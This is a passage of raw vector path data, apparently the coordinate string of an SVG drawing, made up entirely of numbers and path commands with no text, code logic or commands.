4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4